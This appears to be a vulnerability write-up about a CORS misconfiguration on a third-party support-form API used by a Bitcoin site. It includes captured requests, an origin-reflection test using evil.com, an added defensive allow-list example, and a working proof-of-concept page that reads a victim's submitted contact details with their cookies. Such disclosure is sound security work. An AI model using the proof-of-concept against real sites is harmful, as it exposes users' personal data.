Exploiting Misconfigured CORS on popular BTC Site

Severity: Medium

Complexity: Easy

Weakness: Allowing ACAH


On one of the popular BTC sites I was having an issue with my account, so I used their support form to report it.

Information I provided through the form:

  1. Email.
  2. Phone number.
  3. Name.
  4. Message.

I clicked Submit and noticed that the form was being sent to a third-party site,

https://api.thirdparty.com/api/contact/widget/281d02/, as POST data:

POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: REDACTED
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

{"firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9876543210","accountId":"38517","message":"xxx","Tags":[]}


  • After sending the form, I changed the request method to GET,
  • and added Origin: evil.com to the request headers.

GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com

  • Response:

Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true

{"contactUid":"025381","firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9123091647","additionalDetails":{},"accountId":38517,"location":null,"Tags":[]}

  • I was surprised to see Access-Control-Allow-Credentials: true together with the arbitrary Origin reflected in Access-Control-Allow-Origin: that combination lets any page the user visits read this response with the user's cookies attached.
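As an added example (not code from the original write-up or from the third-party vendor), the snippet below puts the origin-reflection pattern behind this finding beside an allow-list version a server should use instead, and adds a small check that classifies a captured response the way a reviewer would. The origins and the allow-list are constructed for the example; note that a real browser sends Origin with a scheme (https://...), unlike the bare evil.com shown in the write-up.

```javascript
// Added example, not part of the original write-up. All hostnames below are
// constructed placeholders.

// Vulnerable pattern: whatever Origin the browser sends is echoed back and
// credentials are allowed, so any site the user visits can read the
// authenticated response.
function reflectingCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened pattern: only an exact match against a fixed allow-list is echoed
// (no substring, prefix or regex matching), and Vary: Origin is set so a cache
// never serves one origin's headers to another.
function allowlistCorsHeaders(requestOrigin, allowedOrigins) {
  if (!requestOrigin || !allowedOrigins.includes(requestOrigin)) {
    // No Access-Control-Allow-Origin at all: the browser blocks the read.
    return { Vary: 'Origin' };
  }
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}

// Review check: given the Origin that was sent and the response headers that
// came back, say what a browser would let that origin read. Whether
// 'credentialed-read' is a bug depends on whether sentOrigin is trusted.
function classifyCorsResponse(sentOrigin, responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = v;
  const acao = h['access-control-allow-origin'];
  const acac = String(h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  if (!acao) return 'blocked';
  // Browsers reject "*" combined with credentials, so nothing is readable.
  if (acao === '*') return acac ? 'invalid-combination' : 'anonymous-read';
  if (acao === sentOrigin) return acac ? 'credentialed-read' : 'anonymous-read';
  return 'blocked';
}

// Walk the write-up's scenario with constructed origins: an attacker page
// against the reflecting server, then against the allow-list server, then the
// site's own front end against the allow-list server.
function demo() {
  const attacker = 'https://evil.example';           // constructed
  const allow = ['https://www.btcsite.example'];     // constructed allow-list
  return {
    vulnerable: classifyCorsResponse(attacker, reflectingCorsHeaders(attacker)),
    hardened: classifyCorsResponse(attacker, allowlistCorsHeaders(attacker, allow)),
    legit: classifyCorsResponse(allow[0], allowlistCorsHeaders(allow[0], allow)),
  };
}

console.log(demo());
```

Running it prints vulnerable: 'credentialed-read', hardened: 'blocked', legit: 'credentialed-read'. The exact-match allow-list also rejects look-alike origins such as https://www.btcsite.example.evil.example, which a startsWith or regex check would often let through.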

PoC page:

<html>
<body onload="load()">
<p id="demo"></p>
Name: <h3 id="name"></h3>
Email : <h3 id="email"></h3>
Phone : <h3 id="phone"></h3>
ACCID :<h3 id="AccountID"></h3>
<h3 id="que"></h3>
<script>
function load(){
  var xhr = new XMLHttpRequest();
  // The victim's session cookie has to accompany the request; the server's
  // Access-Control-Allow-Credentials: true is what lets this page read the reply.
  xhr.withCredentials = true;
  xhr.onreadystatechange = function(){
    if(this.readyState == 4 && this.status == 200){
      var parsed = JSON.parse(this.responseText);
      console.log(parsed);
      // Read fields by name rather than by array position, so the order of
      // keys in the JSON does not matter.
      document.getElementById('email').textContent = parsed.email;
      document.getElementById('name').textContent = parsed.firstName;
      document.getElementById('phone').textContent = parsed.phone;
      document.getElementById('AccountID').textContent = parsed.accountId;
    }
  };
  xhr.open("GET","https://api.thirdparty.com/api/contact/widget/281d02",true);
  xhr.send();
}
</script>
</body>
</html>
  • As soon as the victim (any user who has used their support form at any time, including on an earlier date) visits the malicious page, their previously submitted form data is extracted.